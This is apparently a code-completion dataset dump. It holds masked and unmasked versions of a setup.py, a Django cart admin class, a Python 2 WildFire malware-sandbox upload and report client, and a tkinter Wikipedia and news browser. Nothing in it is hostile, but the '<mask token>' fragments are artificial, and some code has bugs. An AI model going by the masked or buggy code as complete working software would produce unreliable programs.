"blob_id": "88f5aa56eca6b61ba2b428bff0efdf4ec7f5f5d9",
"index": 1913,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='testcov-plugin', version='1.0', packages=['testcov'],\n namespace_packages=['testcov'], entry_points={'plugins': [\n 'testp = testcov.plugin:testp']}, description='Test for coverage bug')\n",
"step-3": "import io\nimport os\nfrom setuptools import setup\nsetup(name='testcov-plugin', version='1.0', packages=['testcov'],\n namespace_packages=['testcov'], entry_points={'plugins': [\n 'testp = testcov.plugin:testp']}, description='Test for coverage bug')\n",
"step-4": "import io\nimport os\nfrom setuptools import setup\n\n\nsetup(name='testcov-plugin',\n version='1.0',\n packages=['testcov'],\n namespace_packages=['testcov'],\n entry_points={\n 'plugins': ['testp = testcov.plugin:testp'],\n },\n description=\"Test for coverage bug\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.contrib import admin
from apps.cart.models import *
# Register your models here.
class CartAdmin(admin.ModelAdmin):
list_display = ('user_id', 'goods_id', 'goods_num')
search_fields = ('user_id', 'goods_id', 'goods_num')
list_filter = ['user_id', 'goods_id', 'goods_num']
admin.site.register(Cart, CartAdmin)
|
normal
|
{
"blob_id": "222948fb0a991bb6d7faa186c7442a303b88290b",
"index": 7184,
"step-1": "<mask token>\n\n\nclass CartAdmin(admin.ModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CartAdmin(admin.ModelAdmin):\n list_display = 'user_id', 'goods_id', 'goods_num'\n search_fields = 'user_id', 'goods_id', 'goods_num'\n list_filter = ['user_id', 'goods_id', 'goods_num']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CartAdmin(admin.ModelAdmin):\n list_display = 'user_id', 'goods_id', 'goods_num'\n search_fields = 'user_id', 'goods_id', 'goods_num'\n list_filter = ['user_id', 'goods_id', 'goods_num']\n\n\nadmin.site.register(Cart, CartAdmin)\n",
"step-4": "from django.contrib import admin\nfrom apps.cart.models import *\n\n\nclass CartAdmin(admin.ModelAdmin):\n list_display = 'user_id', 'goods_id', 'goods_num'\n search_fields = 'user_id', 'goods_id', 'goods_num'\n list_filter = ['user_id', 'goods_id', 'goods_num']\n\n\nadmin.site.register(Cart, CartAdmin)\n",
"step-5": "from django.contrib import admin\r\nfrom apps.cart.models import *\r\n\r\n\r\n# Register your models here.\r\nclass CartAdmin(admin.ModelAdmin):\r\n list_display = ('user_id', 'goods_id', 'goods_num')\r\n search_fields = ('user_id', 'goods_id', 'goods_num')\r\n list_filter = ['user_id', 'goods_id', 'goods_num']\r\n\r\n\r\nadmin.site.register(Cart, CartAdmin)\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python
import argparse
import requests
import sys
import os
import xml.dom.minidom
__author__ = 'Tighe Schlottog || [email protected]'
'''
wf.py is a script to interact with the WildFire API to upload files or pull back reports on specific hashes. You
need to have the argparse and requests installed. Both modules perform their functions perfectly for the work that
is looking to be completed.
For functional assistance, check out the -h or --help options while executing the wf.py script.
Currently the script is configured to use the WildFire public cloud, but you can easily adapt it to use your WF-500.
This script is only for use with file uploads and report pulling.
File uploads are completed and the WildFire reported SHA256 hash will be output.
Report pulls are written in the format of wildfire-report-<SHA256 hash>.<report format>, they can be either PDF or
XML.
'''
# Global Variables (only edit these)
wf_upload_url = 'https://wildfire.paloaltonetworks.com/publicapi/submit/file'
wf_report_url = 'https://wildfire.paloaltonetworks.com/publicapi/get/report'
def parse_args():
'''
This function is used to parse the CLI arguments that are passed into the function, after parsing the data it will
return both the parser itself and the parsed arguments. While not needed, the parser is passed back in case of
future need.
:return: parser - the argparse parser itself
:return: args - the parsed CLI arguments
'''
parser = argparse.ArgumentParser(description='Script to upload unknown files to WildFire.')
group = parser.add_mutually_exclusive_group()
group.add_argument('-f', '--file', type=str, help='Location of file to upload to WildFire')
group.add_argument('-d', '--dir', type=str, help='Location of directory of files to upload to WildFire')
parser.add_argument('-hash', type=str, help='SHA256 hash of file to pull report from WildFire')
parser.add_argument('-api_key', type=str, help='WildFire API Key')
parser.add_argument('-format', type=str, default='pdf', help='Report file format (either xml or pdf)')
parser.add_argument('-hf', '--hashfile', type=str, help='File of hashes to pull reports from WildFire')
args = parser.parse_args()
check_args(parser, args)
return parser, args
def check_args(parser, wf_args):
'''
This function will take in the parser and the parsed args and will perform some basic verification checks. The
checks themselves are more complicated than rules that I can feed into the argparse module.
:param parser: argparse parser
:param wf_args: parsed CLI arguments, came from the parser argparse handler
:return: Nothing, this is just a basic verification check. The function will exit the entire script if it doesn't
pass muster.
'''
if not (((wf_args.file or wf_args.dir) or ((str(wf_args.format).lower() != 'xml' or str(wf_args.format).lower() != 'pdf')and wf_args.hash)) and wf_args.api_key):
print "You are missing one of the necessary options, please check your command structure and try again."
parser.print_help()
sys.exit()
def wf_error_codes(error_code):
'''
This function will take in the HTTP error codes from the requests function in both the upload and download functions
and parse them out into human readable error messages.
:param error_code: http error code from the requests module functions (req_handler.status_code)
:return: Nothing, this will dump human readable errors and exit the script.
'''
if error_code == 401:
print "HTTP Error %s: API Key is invalid, please retry with valid WildFire API key" % error_code
sys.exit()
elif error_code == 404:
print 'HTTP Error %s: Cannot find report associated with requested hash' % error_code
sys.exit()
elif error_code == 405:
print 'HTTP Error %s: You must use the POST method for this call' % error_code
sys.exit()
elif error_code == 413:
print "HTTP Error %s: Sample file size exceeds maximum WildFire allowed size" % error_code
sys.exit()
elif error_code == 418:
print "HTTP Error %s: Sample file type is unsupported" % error_code
sys.exit()
elif error_code == 419:
print "HTTP Error %s: You have exceeded your maximum number of requests per day" % error_code
sys.exit()
elif error_code == 420:
print "HTTP Error %s: Insufficient arguments for accessing the API" % error_code
sys.exit()
elif error_code == 421:
print 'HTTP Error %s: Invalid arguments for accessing the API' % error_code
sys.exit()
elif error_code == 500:
print "HTTP Error %s: WildFire cloud is currently experiencing issues, please try again later" % error_code
sys.exit()
elif error_code == 513:
print 'HTTP Error %s: File upload to WildFire has failed, please check file and try again' % error_code
sys.exit()
else:
print 'An unknown error has occurred, the HTTP status code is ', error_code
sys.exit()
def upload_wf_control(wf_args):
'''
This is a control function to access the upload_wf_file function. For directories, it will look through all the
files in the directory and upload them. For single files, it will push through the single upload.
:param wf_args: These are the parsed CLI arguments from the previous parse_args function.
:return: Nothing, this is a control function which calls another function.
'''
if wf_args.dir:
try:
for file in os.listdir(wf_args.dir):
upload_wf_file(wf_args, '%s/%s' %(wf_args.dir, file))
except OSError as err:
print '%s -> %s' % (err.strerror, wf_args.dir)
elif wf_args.file:
upload_wf_file(wf_args, wf_args.file)
else:
print 'Something went wrong, you should never see this error.'
sys.exit()
def upload_wf_file(wf_args, filename):
'''
This function is used to upload files into the WildFire Cloud
:param wf_args: This is the parsed CLI arguments from the called parse_args function.
:param wf_file: This is the name of the file from either the args.file or from the read directory on args.dir
:return: Nothing, this function only uploads files into the WildFire Cloud.
'''
global wf_upload_url
wf_headers = {'apikey': wf_args.api_key}
try:
wf_file = {'file': open(filename, 'rb')}
except IOError as err:
print 'Unable to open file "%s", %s' % (wf_file, err.strerror)
sys.exit()
try:
wf_req = requests.post(wf_upload_url, data=wf_headers, files=wf_file)
except requests.exceptions.ConnectionError:
print 'An error has occurred contacting %s, please check the URL and try again.' % wf_upload_url
sys.exit()
if wf_req.status_code != requests.codes.ok:
wf_error_codes(wf_req.status_code)
else:
print 'Successfully uploaded %s with SHA256 hash %s' % (filename, xml.dom.minidom.parseString(wf_req.text).getElementsByTagName('sha256')[0].firstChild.nodeValue)
def pull_wf_report(hash, args):
'''
This function will pull down reports from the WildFire Cloud. It can be pulled down in either PDF or XML formats,
the reports will then be written to the file of the appropriate type.
:param args: This is the parsed CLI arguments from the called parse_args function. All components needed will be
pulled from this passed parameter.
:return: Nothing, this function only pulls down reports from the WildFire Cloud.
'''
global wf_report_url
wf_headers = {"apikey": args.api_key, "hash": hash, "format": str(args.format).lower()}
wf_filename = 'wildfire-report-%s.%s' % (hash, str(args.format).lower())
try:
wf_req = requests.post(wf_report_url, data=wf_headers)
except requests.exceptions.ConnectionError:
print 'An error has occurred contacting %s, please check the URL and try again.' % wf_report_url
sys.exit()
if wf_req.status_code != requests.codes.ok:
wf_error_codes(wf_req.status_code)
else:
print 'Successfully pulled report wildfire-report-%s.%s' % (hash, str(args.format).lower())
with open(wf_filename, 'wb') as wf_dataout:
wf_dataout.write(wf_req.content)
def multi_hash(args):
'''
This function will roll through a file one line at a time to pull the associated hashes on that line. It will
assume that there is a single hash per line and chop off anything after a space.
:param args: This is the parsed CLI arguments from the called parse_args function. All components needed will be
pulled from this passed parameter.
:return: Nothing, this function only loops and calls the pull_wf_report function for pulling reports.
'''
with open(args.hashfile, 'r') as hashes:
for hash in hashes:
hash = hash.split() # Drop anything after a space character
pull_wf_report(hash, args)
def main():
args_parser, args = parse_args()
if args.hash:
pull_wf_report(args.hash, args)
elif args.hashfile:
multi_hash(args)
else:
upload_wf_control(args)
pass
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "e8e78610df4461a96f7d9858870de0e3482801fd",
"index": 5083,
"step-1": "#!/usr/bin/env python\n\nimport argparse\nimport requests\nimport sys\nimport os\nimport xml.dom.minidom\n\n__author__ = 'Tighe Schlottog || [email protected]'\n\n'''\n wf.py is a script to interact with the WildFire API to upload files or pull back reports on specific hashes. You\n need to have the argparse and requests installed. Both modules perform their functions perfectly for the work that\n is looking to be completed.\n\n For functional assistance, check out the -h or --help options while executing the wf.py script.\n\n Currently the script is configured to use the WildFire public cloud, but you can easily adapt it to use your WF-500.\n\n This script is only for use with file uploads and report pulling.\n\n File uploads are completed and the WildFire reported SHA256 hash will be output.\n Report pulls are written in the format of wildfire-report-<SHA256 hash>.<report format>, they can be either PDF or\n XML.\n'''\n\n# Global Variables (only edit these)\nwf_upload_url = 'https://wildfire.paloaltonetworks.com/publicapi/submit/file'\nwf_report_url = 'https://wildfire.paloaltonetworks.com/publicapi/get/report'\n\n\ndef parse_args():\n '''\n This function is used to parse the CLI arguments that are passed into the function, after parsing the data it will\n return both the parser itself and the parsed arguments. 
While not needed, the parser is passed back in case of\n future need.\n :return: parser - the argparse parser itself\n :return: args - the parsed CLI arguments\n '''\n parser = argparse.ArgumentParser(description='Script to upload unknown files to WildFire.')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-f', '--file', type=str, help='Location of file to upload to WildFire')\n group.add_argument('-d', '--dir', type=str, help='Location of directory of files to upload to WildFire')\n parser.add_argument('-hash', type=str, help='SHA256 hash of file to pull report from WildFire')\n parser.add_argument('-api_key', type=str, help='WildFire API Key')\n parser.add_argument('-format', type=str, default='pdf', help='Report file format (either xml or pdf)')\n parser.add_argument('-hf', '--hashfile', type=str, help='File of hashes to pull reports from WildFire')\n args = parser.parse_args()\n check_args(parser, args)\n return parser, args\n\n\ndef check_args(parser, wf_args):\n '''\n This function will take in the parser and the parsed args and will perform some basic verification checks. The\n checks themselves are more complicated than rules that I can feed into the argparse module.\n :param parser: argparse parser\n :param wf_args: parsed CLI arguments, came from the parser argparse handler\n :return: Nothing, this is just a basic verification check. 
The function will exit the entire script if it doesn't\n pass muster.\n '''\n if not (((wf_args.file or wf_args.dir) or ((str(wf_args.format).lower() != 'xml' or str(wf_args.format).lower() != 'pdf')and wf_args.hash)) and wf_args.api_key):\n print \"You are missing one of the necessary options, please check your command structure and try again.\"\n parser.print_help()\n sys.exit()\n\n\ndef wf_error_codes(error_code):\n '''\n This function will take in the HTTP error codes from the requests function in both the upload and download functions\n and parse them out into human readable error messages.\n :param error_code: http error code from the requests module functions (req_handler.status_code)\n :return: Nothing, this will dump human readable errors and exit the script.\n '''\n if error_code == 401:\n print \"HTTP Error %s: API Key is invalid, please retry with valid WildFire API key\" % error_code\n sys.exit()\n elif error_code == 404:\n print 'HTTP Error %s: Cannot find report associated with requested hash' % error_code\n sys.exit()\n elif error_code == 405:\n print 'HTTP Error %s: You must use the POST method for this call' % error_code\n sys.exit()\n elif error_code == 413:\n print \"HTTP Error %s: Sample file size exceeds maximum WildFire allowed size\" % error_code\n sys.exit()\n elif error_code == 418:\n print \"HTTP Error %s: Sample file type is unsupported\" % error_code\n sys.exit()\n elif error_code == 419:\n print \"HTTP Error %s: You have exceeded your maximum number of requests per day\" % error_code\n sys.exit()\n elif error_code == 420:\n print \"HTTP Error %s: Insufficient arguments for accessing the API\" % error_code\n sys.exit()\n elif error_code == 421:\n print 'HTTP Error %s: Invalid arguments for accessing the API' % error_code\n sys.exit()\n elif error_code == 500:\n print \"HTTP Error %s: WildFire cloud is currently experiencing issues, please try again later\" % error_code\n sys.exit()\n elif error_code == 513:\n print 'HTTP Error %s: File 
upload to WildFire has failed, please check file and try again' % error_code\n sys.exit()\n else:\n print 'An unknown error has occurred, the HTTP status code is ', error_code\n sys.exit()\n\n\ndef upload_wf_control(wf_args):\n '''\n This is a control function to access the upload_wf_file function. For directories, it will look through all the\n files in the directory and upload them. For single files, it will push through the single upload.\n :param wf_args: These are the parsed CLI arguments from the previous parse_args function.\n :return: Nothing, this is a control function which calls another function.\n '''\n if wf_args.dir:\n try:\n for file in os.listdir(wf_args.dir):\n upload_wf_file(wf_args, '%s/%s' %(wf_args.dir, file))\n except OSError as err:\n print '%s -> %s' % (err.strerror, wf_args.dir)\n elif wf_args.file:\n upload_wf_file(wf_args, wf_args.file)\n else:\n print 'Something went wrong, you should never see this error.'\n sys.exit()\n\n\ndef upload_wf_file(wf_args, filename):\n '''\n This function is used to upload files into the WildFire Cloud\n :param wf_args: This is the parsed CLI arguments from the called parse_args function.\n :param wf_file: This is the name of the file from either the args.file or from the read directory on args.dir\n :return: Nothing, this function only uploads files into the WildFire Cloud.\n '''\n global wf_upload_url\n wf_headers = {'apikey': wf_args.api_key}\n try:\n wf_file = {'file': open(filename, 'rb')}\n except IOError as err:\n print 'Unable to open file \"%s\", %s' % (wf_file, err.strerror)\n sys.exit()\n\n try:\n wf_req = requests.post(wf_upload_url, data=wf_headers, files=wf_file)\n except requests.exceptions.ConnectionError:\n print 'An error has occurred contacting %s, please check the URL and try again.' 
% wf_upload_url\n sys.exit()\n\n if wf_req.status_code != requests.codes.ok:\n wf_error_codes(wf_req.status_code)\n else:\n print 'Successfully uploaded %s with SHA256 hash %s' % (filename, xml.dom.minidom.parseString(wf_req.text).getElementsByTagName('sha256')[0].firstChild.nodeValue)\n\n\ndef pull_wf_report(hash, args):\n '''\n This function will pull down reports from the WildFire Cloud. It can be pulled down in either PDF or XML formats,\n the reports will then be written to the file of the appropriate type.\n :param args: This is the parsed CLI arguments from the called parse_args function. All components needed will be\n pulled from this passed parameter.\n :return: Nothing, this function only pulls down reports from the WildFire Cloud.\n '''\n global wf_report_url\n wf_headers = {\"apikey\": args.api_key, \"hash\": hash, \"format\": str(args.format).lower()}\n wf_filename = 'wildfire-report-%s.%s' % (hash, str(args.format).lower())\n\n try:\n wf_req = requests.post(wf_report_url, data=wf_headers)\n except requests.exceptions.ConnectionError:\n print 'An error has occurred contacting %s, please check the URL and try again.' % wf_report_url\n sys.exit()\n\n if wf_req.status_code != requests.codes.ok:\n wf_error_codes(wf_req.status_code)\n else:\n print 'Successfully pulled report wildfire-report-%s.%s' % (hash, str(args.format).lower())\n with open(wf_filename, 'wb') as wf_dataout:\n wf_dataout.write(wf_req.content)\n\n\ndef multi_hash(args):\n '''\n This function will roll through a file one line at a time to pull the associated hashes on that line. It will\n assume that there is a single hash per line and chop off anything after a space.\n :param args: This is the parsed CLI arguments from the called parse_args function. 
All components needed will be\n pulled from this passed parameter.\n :return: Nothing, this function only loops and calls the pull_wf_report function for pulling reports.\n '''\n with open(args.hashfile, 'r') as hashes:\n for hash in hashes:\n hash = hash.split() # Drop anything after a space character\n pull_wf_report(hash, args)\n\n\ndef main():\n args_parser, args = parse_args()\n if args.hash:\n pull_wf_report(args.hash, args)\n elif args.hashfile:\n multi_hash(args)\n else:\n upload_wf_control(args)\n pass\n\n\nif __name__ == '__main__':\n main()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class MainWindow:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def search_wikipedia(self):
"""Safely browse wikipedia articles."""
self.summary.delete('1.0', tk.END)
possibilities = wk.search(self.search_box.get('1.0', tk.END).
replace('\n', ''))
if len(possibilities) > 0:
try:
p = wk.page(possibilities[0])
except wk.DisambiguationError as e:
p = wk.page(e.options[0])
self.summary.configure(state='normal')
self.summary.delete('1.0', tk.END)
self.summary.insert('1.0', p.summary)
self.summary.configure(state='disabled')
self.p = p
self.update_category_map(p.categories)
self.get_news()
return None
def update_choice(self, value):
"""Update box based on menu choice."""
if self.p is not None:
if value == 'none':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', '')
if value == 'categories':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.categories)
if value == 'pageid':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.pageid)
if value == 'sections':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.sections)
if value == 'html':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.html())
def randomize(self):
"""Randomize wikipedia article."""
self.search_box.delete('1.0', tk.END)
self.search_box.insert('1.0', wk.random())
self.search_wikipedia()
def update_category_map(self, category_list):
"""Update the category map after a search."""
for category in category_list:
skip = False
for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:
if i in category.lower():
skip = True
if skip:
continue
if category in self.category_map:
self.category_map[category] += 1
else:
self.category_map[category] = 1
self.update_top_categories()
def update_top_categories(self):
"""Update the top categories text box."""
cats = self.sorted_categories()
display = ''
for cat in cats:
hit = 'hits' if self.category_map[cat] > 1 else 'hit'
display += f'{cat}, {self.category_map[cat]} {hit}\n'
self.top_categories.configure(state='normal')
self.top_categories.delete('1.0', tk.END)
self.top_categories.insert('1.0', display)
self.top_categories.configure(state='disabled')
def sorted_categories(self):
"""Sort categories by hits."""
count = lambda category: self.category_map[category]
l = sorted(self.category_map, key=count, reverse=True)
if len(l) > 5:
return l[:5]
else:
return l
def get_news(self):
"""Get news using News API."""
if self.api_key_entry.get() == '':
return None
api = nac(api_key=self.api_key_entry.get())
now = datetime.datetime.utcnow()
two_weeks = now - datetime.timedelta(days=14)
query = ''
for cat in self.sorted_categories():
query += f'{cat},'
search = api.get_top_headlines(q=query, sources=
'bbc-news,the-verge', language='en')
news = ''
for article in search['articles']:
news += f"{search['articles'][article]['title']}\n"
self.news_box.delete('1.0', tk.END)
self.news_box.insert('1.0', news)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MainWindow:
<|reserved_special_token_0|>
def __init__(self):
self.p = None
self.main_page = tk.Tk()
self.main_page.title('MetaWikipedia')
self.main_page.geometry('500x500')
self.style = ThemedStyle(self.main_page)
self.style.set_theme('scidblue')
self.left_pane = ttk.PanedWindow(self.main_page)
self.right_pane = ttk.PanedWindow(self.main_page)
self.search = ttk.Button(self.left_pane, text='Search', command=
self.search_wikipedia)
self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)
self.randomize_but = ttk.Button(self.left_pane, text='Randomize',
command=self.randomize)
self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)
self.search_box = tk.Text(self.left_pane)
self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)
self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)
extra_list_choices = ['none', 'categories', 'pageid', 'sections',
'html']
self.extra_list_choice = tk.StringVar()
self.extra_list_choice.set('none')
self.extra_list = ttk.OptionMenu(self.left_pane, self.
extra_list_choice, *extra_list_choices, command=self.update_choice)
self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)
self.other_text = tk.Text(self.left_pane)
self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.api_key_label = ttk.Label(self.right_pane, text='API Key')
self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)
self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')
self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)
self.news_box = tk.Text(self.right_pane)
self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)
self.top_categories_label = ttk.Label(self.right_pane, text=
'Top Categories')
self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,
relwidth=1)
self.top_categories = tk.Text(self.right_pane)
self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.category_map = {}
self.randomize()
self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)
self.main_page.mainloop()
def search_wikipedia(self):
"""Safely browse wikipedia articles."""
self.summary.delete('1.0', tk.END)
possibilities = wk.search(self.search_box.get('1.0', tk.END).
replace('\n', ''))
if len(possibilities) > 0:
try:
p = wk.page(possibilities[0])
except wk.DisambiguationError as e:
p = wk.page(e.options[0])
self.summary.configure(state='normal')
self.summary.delete('1.0', tk.END)
self.summary.insert('1.0', p.summary)
self.summary.configure(state='disabled')
self.p = p
self.update_category_map(p.categories)
self.get_news()
return None
def update_choice(self, value):
"""Update box based on menu choice."""
if self.p is not None:
if value == 'none':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', '')
if value == 'categories':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.categories)
if value == 'pageid':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.pageid)
if value == 'sections':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.sections)
if value == 'html':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.html())
def randomize(self):
"""Randomize wikipedia article."""
self.search_box.delete('1.0', tk.END)
self.search_box.insert('1.0', wk.random())
self.search_wikipedia()
def update_category_map(self, category_list):
"""Update the category map after a search."""
for category in category_list:
skip = False
for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:
if i in category.lower():
skip = True
if skip:
continue
if category in self.category_map:
self.category_map[category] += 1
else:
self.category_map[category] = 1
self.update_top_categories()
def update_top_categories(self):
"""Update the top categories text box."""
cats = self.sorted_categories()
display = ''
for cat in cats:
hit = 'hits' if self.category_map[cat] > 1 else 'hit'
display += f'{cat}, {self.category_map[cat]} {hit}\n'
self.top_categories.configure(state='normal')
self.top_categories.delete('1.0', tk.END)
self.top_categories.insert('1.0', display)
self.top_categories.configure(state='disabled')
def sorted_categories(self):
"""Sort categories by hits."""
count = lambda category: self.category_map[category]
l = sorted(self.category_map, key=count, reverse=True)
if len(l) > 5:
return l[:5]
else:
return l
def get_news(self):
"""Get news using News API."""
if self.api_key_entry.get() == '':
return None
api = nac(api_key=self.api_key_entry.get())
now = datetime.datetime.utcnow()
two_weeks = now - datetime.timedelta(days=14)
query = ''
for cat in self.sorted_categories():
query += f'{cat},'
search = api.get_top_headlines(q=query, sources=
'bbc-news,the-verge', language='en')
news = ''
for article in search['articles']:
news += f"{search['articles'][article]['title']}\n"
self.news_box.delete('1.0', tk.END)
self.news_box.insert('1.0', news)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MainWindow:
    """Tkinter front-end that browses Wikipedia articles and pulls related
    news headlines via the News API.

    The window has two panes: the left pane handles Wikipedia search and
    summary display, the right pane shows News API headlines plus a running
    tally of the most frequently seen article categories.
    """

    def __init__(self):
        # Most recently fetched wikipedia page; None until a search succeeds.
        self.p = None
        self.main_page = tk.Tk()
        self.main_page.title('MetaWikipedia')
        self.main_page.geometry('500x500')
        self.style = ThemedStyle(self.main_page)
        self.style.set_theme('scidblue')
        self.left_pane = ttk.PanedWindow(self.main_page)
        self.right_pane = ttk.PanedWindow(self.main_page)
        # --- Left pane: search controls, article summary, extra metadata ---
        self.search = ttk.Button(self.left_pane, text='Search',
                                 command=self.search_wikipedia)
        self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)
        self.randomize_but = ttk.Button(self.left_pane, text='Randomize',
                                        command=self.randomize)
        self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)
        self.search_box = tk.Text(self.left_pane)
        self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)
        self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
        self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)
        extra_list_choices = ['none', 'categories', 'pageid', 'sections',
                              'html']
        self.extra_list_choice = tk.StringVar()
        self.extra_list_choice.set('none')
        self.extra_list = ttk.OptionMenu(self.left_pane,
                                         self.extra_list_choice,
                                         *extra_list_choices,
                                         command=self.update_choice)
        self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)
        self.other_text = tk.Text(self.left_pane)
        self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
        # --- Right pane: News API key entry, headlines, top categories ---
        self.api_key_label = ttk.Label(self.right_pane, text='API Key')
        self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)
        # NOTE(review): ttk.Entry has no standard 'text' option — confirm this
        # keyword is accepted by the Tk build in use.
        self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')
        self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)
        self.news_box = tk.Text(self.right_pane)
        self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)
        self.top_categories_label = ttk.Label(self.right_pane,
                                              text='Top Categories')
        self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,
                                        relwidth=1)
        self.top_categories = tk.Text(self.right_pane)
        self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
        # Maps category name -> number of searches in which it appeared.
        self.category_map = {}
        # Seed the UI with a random article before entering the event loop.
        self.randomize()
        self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
        self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)
        self.main_page.mainloop()

    def search_wikipedia(self):
        """Look up the search-box text on Wikipedia and show its summary.

        Uses the first search suggestion; if that title is ambiguous, the
        first disambiguation option is used instead of raising.
        """
        self.summary.delete('1.0', tk.END)
        possibilities = wk.search(self.search_box.get('1.0', tk.END)
                                  .replace('\n', ''))
        if len(possibilities) > 0:
            try:
                p = wk.page(possibilities[0])
            except wk.DisambiguationError as e:
                # Ambiguous title: fall back to the first concrete option.
                p = wk.page(e.options[0])
            self.summary.configure(state='normal')
            self.summary.delete('1.0', tk.END)
            self.summary.insert('1.0', p.summary)
            self.summary.configure(state='disabled')
            self.p = p
            self.update_category_map(p.categories)
            self.get_news()
        return None

    def update_choice(self, value):
        """Show the selected piece of page metadata in the extra text box.

        ``value`` is one of the OptionMenu choices ('none', 'categories',
        'pageid', 'sections', 'html'). Does nothing before the first
        successful search (``self.p`` still None).
        """
        if self.p is not None:
            if value == 'none':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', '')
            elif value == 'categories':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.categories)
            elif value == 'pageid':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.pageid)
            elif value == 'sections':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.sections)
            elif value == 'html':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.html())

    def randomize(self):
        """Load a random Wikipedia article title and search for it."""
        self.search_box.delete('1.0', tk.END)
        self.search_box.insert('1.0', wk.random())
        self.search_wikipedia()

    def update_category_map(self, category_list):
        """Fold a page's categories into the running hit counts.

        Wikipedia-internal housekeeping categories (maintenance, sourcing,
        stubs, archives) are skipped so the tally reflects actual topics.
        """
        for category in category_list:
            lowered = category.lower()
            # Skip Wikipedia-internal maintenance categories.
            if any(word in lowered for word in
                   ('wiki', 'sources', 'article', 'stub', 'wayback', 'cs1')):
                continue
            self.category_map[category] = self.category_map.get(category, 0) + 1
        self.update_top_categories()

    def update_top_categories(self):
        """Render the most-seen categories into the read-only text box."""
        display = ''
        for cat in self.sorted_categories():
            hit = 'hits' if self.category_map[cat] > 1 else 'hit'
            display += f'{cat}, {self.category_map[cat]} {hit}\n'
        self.top_categories.configure(state='normal')
        self.top_categories.delete('1.0', tk.END)
        self.top_categories.insert('1.0', display)
        self.top_categories.configure(state='disabled')

    def sorted_categories(self):
        """Return up to five category names, most frequently seen first."""
        ranked = sorted(self.category_map, key=self.category_map.get,
                        reverse=True)
        return ranked[:5]

    def get_news(self):
        """Fetch top headlines related to the current top categories.

        No-op when the API key entry is empty. Headlines replace any
        previous contents of the news box.
        """
        if self.api_key_entry.get() == '':
            return None
        api = nac(api_key=self.api_key_entry.get())
        query = ''
        for cat in self.sorted_categories():
            query += f'{cat},'
        search = api.get_top_headlines(q=query,
                                       sources='bbc-news,the-verge',
                                       language='en')
        news = ''
        # BUG FIX: search['articles'] is a list of article dicts, so iterate
        # the dicts directly; the old code indexed the list with a dict
        # (TypeError whenever any headline came back).
        for article in search['articles']:
            news += f"{article['title']}\n"
        self.news_box.delete('1.0', tk.END)
        self.news_box.insert('1.0', news)
# Launch the GUI; MainWindow() blocks in Tk's mainloop until the window closes.
if __name__ == '__main__':
    main_window = MainWindow()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import tkinter as tk
from tkinter import ttk
from ttkthemes import ThemedStyle
import wikipedia as wk
